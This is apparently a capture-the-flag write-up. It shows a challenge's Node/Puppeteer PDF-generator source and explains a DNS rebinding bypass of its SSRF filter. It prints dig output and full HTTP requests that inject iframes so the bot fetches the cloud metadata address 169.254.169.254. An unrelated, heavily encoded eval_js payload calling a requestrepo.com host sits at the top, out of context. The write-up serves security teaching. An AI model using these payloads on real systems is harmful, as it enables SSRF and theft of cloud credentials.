Content-Length: 252

script="http://127.0.0.1:5000/api/eval_js/'http:%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%32%25%32%35%25%33%36%25%33%36%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%32%25%32%35%25%33%36%25%33%36h8e0icum.requestrepo.com',False"&es6=False

A bit better now but still we have to encode the inner one 4 times...

Evaluation Corp Certificate of Support

Description

Get the flag!

Resources

const express = require('express');
const app = express();
const bodyParser = require('body-parser');
const handlebars = require('express-handlebars');
const puppeteer = require('puppeteer');
const ssrfFilter = require('ssrf-req-filter');
const axios = require('axios');
const dns = require('dns');

// Use Handlebars as the view engine
app.engine('handlebars', handlebars.engine());
app.set('view engine', 'handlebars');

// Middleware
app.use(bodyParser.json());
app.use(express.static('public'));

// Routes
app.get('/', (req, res) => {
    res.render('index');
});

app.post('/generate', async (req, res) => {
    const name = req.body.name;

    const data = `
        <!DOCTYPE html>
        <html>
        <head>
            <title>Evaluation Corp Certificate of Support</title>
        </head>
        <body style="font-family: Arial, sans-serif; text-align: center;">
            <div style="border: 2px solid #3498db; padding: 20px; max-width: 600px; margin: 0 auto;">
                <h1 style="color: #3498db;">Certificate of Support</h1>
                <p>This is to certify that</p>
                <h2 style="color: #333;">${name}</h2>
                <p>Has shown outstanding support and dedication to</p>
                <h3 style="color: #333;">Evil Corp</h3>
                <p>on this day,</p>
                <p style="color: #333;">${new Date('August 1, 2024').toLocaleDateString('en-US', { year: 'numeric', month: 'long', day: 'numeric' })}</p>
                <p>By contributing their time and expertise, ${name} has made a significant impact on the success of Evil Corp.</p>
                <p>Thank you for your unwavering support.</p>
                <br>
                <p style="font-size: 18px;">Authorized Signature:</p>
                <img src="" alt="Authorized Signature" style="max-width: 200px;">
            </div>
        </body>
        </html>
    `
    const browser = await puppeteer.launch();
    const page = await browser.newPage();

    await page.setRequestInterception(true);
    page.on('request', async (request) => {
        let result = await isUrlSafe(request.url())
        console.log('result: ' + result)
        if (result) {
            if (result == '169.254.169.254') {
                request.respond({status: 200, contentType: 'text/plain', body: 'WIZER{H0w_D1d_YOU_D0_Th4ttttt???}'});
            } else {
                request.continue();
            }
        } else {
            request.respond({status: 200, contentType: 'text/plain', body: 'This request either failed, or was blocked.'});        
        }
    });

    try {
        await page.setContent(data, {timeout: 5000}); // Set the content of the page to the HTML string
        await page.pdf({ path: 'certificate.pdf', format: 'A4' }); // Generate a PDF from the page content
        await browser.close();
        res.download('certificate.pdf', 'certificate.pdf');
    } catch (error) {
        res.json(error)
    }
});

// Check if the URL is safe
async function isUrlSafe(url) {
    try {
        await axios.get(url, {httpAgent: ssrfFilter(url), httpsAgent: ssrfFilter(url)});
    } catch (error) {
        console.log('BLOCKED: ' + url)
        return false; // Return false if there's an error making the request
    }
    
    let domain = new URL(url).hostname;

    if (domain) {
        await new Promise(resolve => setTimeout(resolve, 1000));
        const addresses = await dns.promises.resolve4(domain);
        if (addresses) {
            console.log(addresses)
            return addresses[0];  
        }
    }
    return '0.0.0.0'
}

// Start the server
const PORT = process.env.PORT || 3000;
app.listen(PORT, () => {
    console.log(`Server is running on port ${PORT}`);
});

Flag conditions

In order to get the flag we need to make the bot request 169.254.169.254

Analysis

A rather simple application this time around, while this was supposed to be the hardest challenge I didn't find it very difficult you just need to be aware of a vulnerability which is a bit niche, but other than that that's the only thing.

Let's break it down. On the /generate endpoint we pass a name parameter which is directly injected into the html of the page which will a later on be opened by a headless browser(a bot)

The bot is going to print the page as a pdf and returns the result to us.

Before it does that though it intercepts all requests that the browser makes and ensures that their urls pass isUrlSafe, if they don't then they are simply blocked.

Vulnerability

The vulnerability here is DNS Rebinding learn more in my recent post for the HackTheBox challenge saturn

DNS Rebinding is a TOCTOU (Time Of Check, Time Of Use). This makes sense, because taking the example of our application a check request is firstly done and then the actual request. The vulnerability lies in the Ability of a dns to have a realy short TTL (Time to live). Because this allows an automated script to hot-swap the IP the DNS will resolve to, very quickly, in between the check and actual request.

A very good website to assist in such attacks is: https://lock.cmpxchg8b.com/rebinder.html

To use this page, enter two ip addresses you would like to switch between. The hostname generated will resolve randomly to one of the addresses specified with a very low ttl

It allows to enter to IP addresses (A and B) from which it will very quickly change the generated domain's a record between the two

dig 7f000001.c0a80001.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER 
7f000001.c0a80001.rbndr.us.     A       IN      1s      192.168.0.1     192.168.10.5:53
❯ dig 7f000001.c0a80001.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER 
7f000001.c0a80001.rbndr.us.     A       IN      30s     192.168.0.1     192.168.10.5:53
❯ dig 7f000001.c0a80001.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER 
7f000001.c0a80001.rbndr.us.     A       IN      0s      127.0.0.1       192.168.10.5:53
❯ dig 7f000001.c0a80001.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER 
7f000001.c0a80001.rbndr.us.     A       IN      1s      127.0.0.1       192.168.10.5:53
❯ dig 7f000001.c0a80001.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER 
7f000001.c0a80001.rbndr.us.     A       IN      0s      127.0.0.1       192.168.10.5:53

So in order to achieve our goal we need to pass a domain that will switch between a valid and resolvable ip and 169.254.169.254

To get a valid and resolvable server you can just dig websites that are not very big in traffic(because big sites have bot protections etc...), but just to save time in searching I used one of my own servers

Consider my server ip: 113.16.12.52 On the server we can host a working website using

$ python3 -m http.server 80

Thus if we now generate a domain with 113.16.12.52, 169.254.169.254 as A and B we get 71100c34.a9fea9fe.rbndr.us. Lets double check it.

❯ dig 71100c34.a9fea9fe.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER
71100c34.a9fea9fe.rbndr.us.     A       IN      1s      113.16.12.52    8.8.8.8:53
❯ dig 71100c34.a9fea9fe.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER
71100c34.a9fea9fe.rbndr.us.     A       IN      1s      113.16.12.52    8.8.8.8:53
❯ dig 71100c34.a9fea9fe.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER
71100c34.a9fea9fe.rbndr.us.     A       IN      1s      113.16.12.52    8.8.8.8:53
❯ dig 71100c34.a9fea9fe.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER
71100c34.a9fea9fe.rbndr.us.     A       IN      1s      113.16.12.52    8.8.8.8:53
❯ dig 71100c34.a9fea9fe.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER
71100c34.a9fea9fe.rbndr.us.     A       IN      1s      113.16.12.52    8.8.8.8:53
❯ dig 71100c34.a9fea9fe.rbndr.us
^[[ANAME                        TYPE    CLASS   TTL     ADDRESS         NAMESERVER
71100c34.a9fea9fe.rbndr.us.     A       IN      1s      113.16.12.52    8.8.8.8:53
❯ dig 71100c34.a9fea9fe.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER
71100c34.a9fea9fe.rbndr.us.     A       IN      1s      113.16.12.52    8.8.8.8:53
❯ dig 71100c34.a9fea9fe.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER
71100c34.a9fea9fe.rbndr.us.     A       IN      1s      169.254.169.254 8.8.8.8:53
❯ dig 71100c34.a9fea9fe.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER
71100c34.a9fea9fe.rbndr.us.     A       IN      1s      169.254.169.254 8.8.8.8:53
❯ dig 71100c34.a9fea9fe.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER
71100c34.a9fea9fe.rbndr.us.     A       IN      1s      169.254.169.254 8.8.8.8:53
❯ dig 71100c34.a9fea9fe.rbndr.us
NAME                            TYPE    CLASS   TTL     ADDRESS         NAMESERVER
71100c34.a9fea9fe.rbndr.us.     A       IN      1s      113.16.12.52    8.8.8.8:53

Ok then let's chain everything together now

POST /generate HTTP/1.1
Host: 161.35.120.160:3000
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 191

{"name":"<iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe>"}

Like this we create an iframe that will be rendered in the pdf and hope that we get the right timing and we get the flag in the iframe.

To improve our chances of getting the timing correct we can do something very simple. Let's just make more requests 🤣

POST /generate HTTP/1.1
Host: 161.35.120.160:3000
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 1723

{"name":"<iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe><iframe src='http://71100c34.a9fea9fe.rbndr.us'></iframe>"}

By doing that we should hopefully now received a pdf with the flag inside along some other requests that may have failed.